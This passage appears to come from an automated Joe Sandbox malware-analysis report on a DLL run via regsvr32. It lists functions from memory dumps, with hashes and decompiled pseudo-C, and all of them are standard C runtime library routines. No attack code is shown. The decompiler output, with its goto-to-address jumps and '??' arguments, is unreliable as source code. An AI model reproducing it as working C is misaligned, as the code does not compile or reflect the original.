                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_unlock
                                    • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2816345473-1282596470
                                    • Opcode ID: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                    • Instruction ID: 5fae40e96951f3d59b44a89f64fcf0ff6634817f5e1c8960b8a37b7fc16bb0b2
                                    • Opcode Fuzzy Hash: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                    • Instruction Fuzzy Hash: CF313472D1D2428AE3A08B68ED4576EB3E0F741364F615236A2CD866F5D77EE4488B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D40070 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free_nolock$_unlock
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                    • API String ID: 2500497606-1087415141
                                    • Opcode ID: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                    • Instruction ID: 19d3e213fdd89feddaad3ed7c2e4781bfc305c80ac1e5456795dd8baf3e1709b
                                    • Opcode Fuzzy Hash: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                    • Instruction Fuzzy Hash: FB21FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D35393 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                    • String ID: csm
                                    • API String ID: 933340387-1018135373
                                    • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                    • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                    • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                    • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D39694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-23161695
                                    • Opcode ID: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                    • Instruction ID: 83327c57c34769199563c7dbb3a6bce46be38180c11154985772b493e57d3243
                                    • Opcode Fuzzy Hash: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                    • Instruction Fuzzy Hash: 611127B1A29602CAF7D0AB24ED5476E72E1F380389F60A125E2DD426E4D7BEE5448B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D39939 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-3042049227
                                    • Opcode ID: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                    • Instruction ID: 227cbb44b92b13f2699fc348b07479794ffd84b2571dbd840c84b1baf771b638
                                    • Opcode Fuzzy Hash: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                    • Instruction Fuzzy Hash: 1A115731E0C6429AF7A49F24EC117AE73D0F780398FA09126D2CD426E5DB7EE644CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3976D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-1338331675
                                    • Opcode ID: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                    • Instruction ID: 6bd6a3a9ad0f3f204fba163462b9475bfd771603381d6f38345b55863188decb
                                    • Opcode Fuzzy Hash: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                    • Instruction Fuzzy Hash: 0B0108B1A1C642C6FBA0AB64EC407AD36E0F380358FB04125E2CD476F5D7BEE9458B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D39A9B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DecodePointer__doserrno_invalid_parameter
                                    • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 1098298932-1795423647
                                    • Opcode ID: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                    • Instruction ID: 84e1f9b7d4b50a62aaca49ed338a5ee7eeb2a48d33c586d02a205ea10770b6a2
                                    • Opcode Fuzzy Hash: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                    • Instruction Fuzzy Hash: 8CE03961A0890691F6D4AF14EC113ED2290A740788FE1422290CC072F2CB7EA6058751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2F570 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 16%
                                    			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				signed int _v48;
				int _v52;
				int _v56;
				signed int _v64;
				long long _v72;
				long long _t82;

				_a32 = r9d;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v56 = 0;
				if (_a48 != 0) goto 0xf9d2f5ab;
				_a48 =  *((intOrPtr*)( *_a8 + 4));
				if (_a64 == 0) goto 0xf9d2f5bf;
				_v32 = 9;
				goto 0xf9d2f5c7;
				_v32 = 1;
				_v64 = 0;
				_v72 = 0;
				r9d = _a32;
				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v48 != 0) goto 0xf9d2f60b;
				goto 0xf9d2f6f8;
				if (0 != 0) goto 0xf9d2f652;
				if (_v48 <= 0) goto 0xf9d2f652;
				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
				_t82 = _v48 + _v48 + 0x10;
				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
				_v24 = _t82;
				goto 0xf9d2f65b;
				_v24 = 0;
				_v40 = _v24;
				if (_v40 != 0) goto 0xf9d2f674;
				goto 0xf9d2f6f8;
				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
				_v64 = _v48;
				_v72 = _v40;
				r9d = _a32;
				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v52 == 0) goto 0xf9d2f6ea;
				r8d = _v52;
				_v56 = GetStringTypeW(??, ??, ??, ??);
				E000007FE7FEF9D2F3E0(_v40);
				return _v56;
			}












                                    0x7fef9d2f570
                                    0x7fef9d2f575
                                    0x7fef9d2f57a
                                    0x7fef9d2f57e
                                    0x7fef9d2f587
                                    0x7fef9d2f597
                                    0x7fef9d2f5a4
                                    0x7fef9d2f5b3
                                    0x7fef9d2f5b5
                                    0x7fef9d2f5bd
                                    0x7fef9d2f5bf
                                    0x7fef9d2f5c7
                                    0x7fef9d2f5cf
                                    0x7fef9d2f5d8
                                    0x7fef9d2f5f9
                                    0x7fef9d2f602
                                    0x7fef9d2f606
                                    0x7fef9d2f60f
                                    0x7fef9d2f616
                                    0x7fef9d2f62a
                                    0x7fef9d2f631
                                    0x7fef9d2f646
                                    0x7fef9d2f64b
                                    0x7fef9d2f650
                                    0x7fef9d2f652
                                    0x7fef9d2f660
                                    0x7fef9d2f66b
                                    0x7fef9d2f66f
                                    0x7fef9d2f686
                                    0x7fef9d2f68f
                                    0x7fef9d2f698
                                    0x7fef9d2f69d
                                    0x7fef9d2f6bf
                                    0x7fef9d2f6c8
                                    0x7fef9d2f6d2
                                    0x7fef9d2f6e6
                                    0x7fef9d2f6ef
                                    0x7fef9d2f6fc

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                    • String ID:
                                    • API String ID: 2618398691-0
                                    • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                    • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                    • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                    • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3FF00 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
				signed int _v16;
				signed int _v20;
				signed int _v24;

				_a8 = __ecx;
				_v24 = 0;
				_v16 = 0;
				0xf9d29300();
				_v20 = 0;
				_v20 = _v20 + 1;
				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
				if (_a8 != 1) goto 0xf9d3ffe1;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
				_v24 = _v24 + 1;
				goto 0xf9d40024;
				if (_a8 != 0) goto 0xf9d40024;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
				_v16 = 0xffffffff;
				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				goto L1;
				__ecx = 1;
				__eax = E000007FE7FEF9D29360(__eax, 1);
				if (_a8 != 1) goto 0xf9d4005b;
				__eax = _v24;
				goto 0xf9d4005f;
				__eax = _v16;
				return _v16;
			}






                                    0x7fef9d3ff00
                                    0x7fef9d3ff08
                                    0x7fef9d3ff10
                                    0x7fef9d3ff1d
                                    0x7fef9d3ff23
                                    0x7fef9d3ff33
                                    0x7fef9d3ff41
                                    0x7fef9d3ff58
                                    0x7fef9d3ff78
                                    0x7fef9d3ff92
                                    0x7fef9d3ffb2
                                    0x7fef9d3ffb9
                                    0x7fef9d3ffd3
                                    0x7fef9d3ffdb
                                    0x7fef9d3ffdf
                                    0x7fef9d3ffe6
                                    0x7fef9d40000
                                    0x7fef9d4001a
                                    0x7fef9d4001c
                                    0x7fef9d40038
                                    0x7fef9d4003d
                                    0x7fef9d40042
                                    0x7fef9d40047
                                    0x7fef9d40051
                                    0x7fef9d40053
                                    0x7fef9d40059
                                    0x7fef9d4005b
                                    0x7fef9d40063

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                    • String ID:
                                    • API String ID: 1144694634-0
                                    • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                    • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                    • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                    • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D33CC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t135;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t200;
				intOrPtr _t206;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				0xf9d24000();
				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
				goto 0xf9d3409c;
				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
				if (_a40[1] == 0) goto 0xf9d33ee4;
				if (_a48 != 0) goto 0xf9d33ee4;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
				goto 0xf9d33e0f;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v56;
				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
				goto 0xf9d33ec7;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
				_v48 = _a8;
				_v52 =  *((intOrPtr*)(_v48 + 0x38));
				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
				goto 0xf9d33e9a;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v52;
				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
				goto 0xf9d3409c;
				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
				goto 0xf9d34097;
				if (_a40[3] != 0) goto 0xf9d33f59;
				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
				_t200 = _a40;
				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
				_v24 = _t200 + _a40[8];
				goto 0xf9d33f4d;
				_v24 = 0;
				if (_v24 == 0) goto 0xf9d34097;
				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
				_t206 =  *((intOrPtr*)(_a8 + 0x30));
				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
				E000007FE7FEF9D2E6A0(_t135, _t206);
				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
				goto 0xf9d33fce;
				_v16 = 0;
				_v40 = _v16;
				_t177 = _v40;
				if (_v40 == 0) goto 0xf9d34041;
				_v64 = _a64 & 0x000000ff;
				_v72 = _a56;
				_v80 = _a48;
				_v88 = _a40;
				_v32 = _v40();
				goto 0xf9d34097;
				_v64 = _a56;
				_v72 = _a48;
				_v80 = _a64 & 0x000000ff;
				_v88 = _a40;
				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
				return 1;
			}





















                                    0x7fef9d33cc0
                                    0x7fef9d33cc5
                                    0x7fef9d33cca
                                    0x7fef9d33ccf
                                    0x7fef9d33cd8
                                    0x7fef9d33ce4
                                    0x7fef9d33cf8
                                    0x7fef9d33d08
                                    0x7fef9d33d16
                                    0x7fef9d33d28
                                    0x7fef9d33d38
                                    0x7fef9d33d4e
                                    0x7fef9d33d60
                                    0x7fef9d33d67
                                    0x7fef9d33d7c
                                    0x7fef9d33d8e
                                    0x7fef9d33d9c
                                    0x7fef9d33db2
                                    0x7fef9d33dc6
                                    0x7fef9d33dec
                                    0x7fef9d33df5
                                    0x7fef9d33e06
                                    0x7fef9d33e08
                                    0x7fef9d33e0a
                                    0x7fef9d33e0f
                                    0x7fef9d33e2c
                                    0x7fef9d33e3b
                                    0x7fef9d33e50
                                    0x7fef9d33e60
                                    0x7fef9d33e6a
                                    0x7fef9d33e77
                                    0x7fef9d33e80
                                    0x7fef9d33e91
                                    0x7fef9d33e93
                                    0x7fef9d33e95
                                    0x7fef9d33e9a
                                    0x7fef9d33eb8
                                    0x7fef9d33ec2
                                    0x7fef9d33edf
                                    0x7fef9d33eee
                                    0x7fef9d33eff
                                    0x7fef9d33f15
                                    0x7fef9d33f1b
                                    0x7fef9d33f27
                                    0x7fef9d33f29
                                    0x7fef9d33f3d
                                    0x7fef9d33f42
                                    0x7fef9d33f44
                                    0x7fef9d33f53
                                    0x7fef9d33f67
                                    0x7fef9d33f79
                                    0x7fef9d33f8e
                                    0x7fef9d33f9c
                                    0x7fef9d33fa4
                                    0x7fef9d33fa6
                                    0x7fef9d33fbe
                                    0x7fef9d33fc3
                                    0x7fef9d33fc5
                                    0x7fef9d33fd3
                                    0x7fef9d33fd8
                                    0x7fef9d33fde
                                    0x7fef9d33fe8
                                    0x7fef9d33ff4
                                    0x7fef9d34000
                                    0x7fef9d3400c
                                    0x7fef9d34035
                                    0x7fef9d3403f
                                    0x7fef9d34049
                                    0x7fef9d34055
                                    0x7fef9d34061
                                    0x7fef9d3406d
                                    0x7fef9d34092
                                    0x7fef9d340a0

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _inconsistency
                                    • String ID: csm$csm
                                    • API String ID: 32975420-3733052814
                                    • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                    • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                    • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                    • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D29640 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __free_lconv_mon__free_lconv_num
                                    • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                    • API String ID: 2148069796-2706031433
